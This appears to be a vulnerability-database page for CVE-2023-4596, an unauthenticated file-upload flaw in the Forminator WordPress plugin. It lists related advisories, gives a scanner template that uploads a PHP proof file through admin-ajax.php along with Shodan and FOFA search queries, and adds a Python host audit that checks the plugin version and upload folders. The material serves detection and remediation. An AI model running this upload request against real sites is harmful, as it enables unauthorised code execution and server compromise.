| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for CVE-2023-4596 | 18 May 2024 01:39 | – | githubexploit |
| Exploit for CVE-2023-4596 | 6 Aug 2024 08:12 | – | githubexploit |
| The vulnerability of the upload_post_image() function in the Forminator plugin of the WordPress content management system allows a hacker to bypass security restrictions and execute arbitrary code. | 7 Sep 2023 00:00 | – | bdu_fstec |
| CVE-2023-4596 | 30 Aug 2023 22:45 | – | circl |
| WordPress plugin Forminator code issue vulnerability | 30 Aug 2023 00:00 | – | cnnvd |
| CVE-2023-4596 | 30 Aug 2023 01:45 | – | cve |
| CVE-2023-4596 Forminator <= 1.24.6 - Unauthenticated Arbitrary File Upload | 30 Aug 2023 01:45 | – | cvelist |
| CVE-2023-4596 | 30 Aug 2023 02:15 | – | nvd |
| WordPress Forminator Plugin < 1.25.0 Arbitrary File Upload Vulnerability | 6 Sep 2023 00:00 | – | openvas |
| WordPress Forminator Plugin <= 1.24.6 is vulnerable to Arbitrary File Upload | 29 Aug 2023 00:00 | – | patchstack |

```yaml
id: CVE-2023-4596

info:
  name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
  author: E1A
  severity: critical
  description: |
    The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  impact: |
    Unauthenticated attackers can upload arbitrary files including malicious PHP code, potentially leading to complete server compromise and remote code execution.
  remediation: |
    Update the Forminator plugin to version 1.24.7 or later which includes proper file type validation.
  reference:
    - https://www.exploit-db.com/exploits/51664
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
    - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
    - https://github.com/E1A/CVE-2023-4596
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4596
    cwe-id: CWE-434
    epss-score: 0.12749
    epss-percentile: 0.95777
    cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incsub
    product: forminator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/forminator
    fofa-query: body=/wp-content/plugins/forminator
    publicwww-query:
      - /wp-content/plugins/Forminator
      - /wp-content/plugins/forminator
  tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev,vuln

variables:
  string: "CVE-2023-4596"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe

        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="textarea-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="phone-1"

        {{rand_int(10)}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="email-1"

        [email protected]
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="name-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="forminator_nonce"

        {{forminator_nonce}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="form_id"

        {{form_id}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="current_url"

        {{BaseURL}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="action"

        forminator_submit_form_custom-forms
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Upload file</label>'
          - 'forminator-field-upload'
        condition: and

      - type: word
        part: body_2
        words:
          - '{"success":true'
          - '"form_id":"{{form_id}}"'
          - '"behav'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: forminator_nonce
        part: body
        group: 1
        regex:
          - 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'name="form_id" value="([0-9]+)">'
        internal: true
# digest: 4a0a0047304502205ea9f7fa432bd2074f5761bde1a81cdc6b7a8b62f8a64c51d729fc749db2363d022100d15f59f59799112534b9f4696cb9751066c904b328499622350b54d20fd06bd1:922c64590222798bb761d5b6d8e72950
```
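A host-side audit for the condition the template probes remotely, as an added example that is not part of the template or of the Forminator project: it compares the installed plugin version with the 1.24.7 remediation release and lists files in the uploads tree that carry a server-executable extension. The main file name `forminator.php`, the default `wp-content/uploads` location, the extension list and the helper `build_demo_site` (which creates constructed sample data) are assumptions.

```python
import re
import tempfile
from pathlib import Path

FIXED = (1, 24, 7)  # first fixed release per the template's remediation field
# Assumption: extensions a PHP-enabled web server is commonly configured to execute.
EXEC_EXT = {".php", ".phtml", ".phar", ".php5", ".php7"}
HEADER = re.compile(r"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)", re.M | re.I)

def plugin_version(wp_root):
    """Parse the plugin header; the main file name forminator.php is an assumption."""
    main = Path(wp_root) / "wp-content/plugins/forminator/forminator.php"
    if not main.is_file():
        return None
    m = HEADER.search(main.read_text(errors="replace")[:8192])
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_vulnerable(version):
    """True for any installed version below the fixed release."""
    return version is not None and version < FIXED

def executable_uploads(wp_root):
    """List files under wp-content/uploads carrying a server-executable extension."""
    uploads = Path(wp_root) / "wp-content/uploads"
    if not uploads.is_dir():
        return []
    return sorted(
        p.relative_to(wp_root).as_posix()
        for p in uploads.rglob("*")
        if p.is_file() and EXEC_EXT & {s.lower() for s in p.suffixes}
    )

def build_demo_site(version="1.24.6"):
    """Constructed sample tree (not real data) so the audit runs offline."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    plugin = root / "wp-content/plugins/forminator"
    month = root / "wp-content/uploads/2023/08"
    plugin.mkdir(parents=True)
    month.mkdir(parents=True)
    (plugin / "forminator.php").write_text(f"<?php\n/**\n * Version: {version}\n */\n")
    (month / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    (month / "a1b2c3.php").write_text("<?php // constructed placeholder\n")
    (month / "note.php.txt").write_text("constructed double-extension sample\n")
    return root

if __name__ == "__main__":
    site = build_demo_site()
    version = plugin_version(site)
    print("forminator", version, "vulnerable:", is_vulnerable(version))
    print("review:", executable_uploads(site))
```

Placeholder `index.php` files that some plugins drop into upload folders are listed too, so treat the output as items to review.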